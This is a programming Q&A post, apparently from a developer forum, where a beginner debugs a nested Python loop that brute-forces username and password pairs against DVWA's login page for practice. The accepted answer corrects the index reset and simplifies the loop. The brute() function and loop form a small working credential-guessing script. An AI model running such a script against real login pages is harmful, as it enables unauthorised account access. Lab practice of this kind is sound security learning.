# Python loop for dvwa bruteforce

Tags: python, python-3.x, list, for-loop, while-loop

**trying to make user : pass bruteforce in python for dvwa practice**

**what i am trying to do :**

i have 10 passwords and 10 usernames in a list[]

loop should take one username and try all 10 passwords on it, then 2nd username and do same

here is code i am using

```
u=0
p=0
try:
    while True:
        for _ in usernames:
            user = usernames[u]
            u+=1
            for _ in passwords:
                passwd = passwords[p]
                brute(user, passwd)
                print("trying password on %s : %s " % (user, passwd), end="\r")
                p+=1
except IndexError:
            pass
```

it stops after trying all passwords on 1st username and ends program.

what am i doing wrong here ? , apologies newbie programmer

**brute function**

```
def brute(user, passwd):
    hit = session.get(target + 'vulnerabilities/brute/?username=%s&password=%s&Login=Login' % (user, passwd))
    soup = BeautifulSoup(hit.text, 'html.parser')
    if str(soup.p) == "<p>Welcome to the password protected area admin</p>":
        print('login success =>')
        return True
    return False
```

Answer (score 1, accepted):

You forgot to set `p=0` before passwords loop. Therefore, it gives an `IndexError` in the iteration of second user and first password.

By the way, your code could be simplified to this:

```
for username in usernames:
    for password in passwords:
        print("trying password on %s : %s " % (username, password), end="\r")
        brute(username, password)
```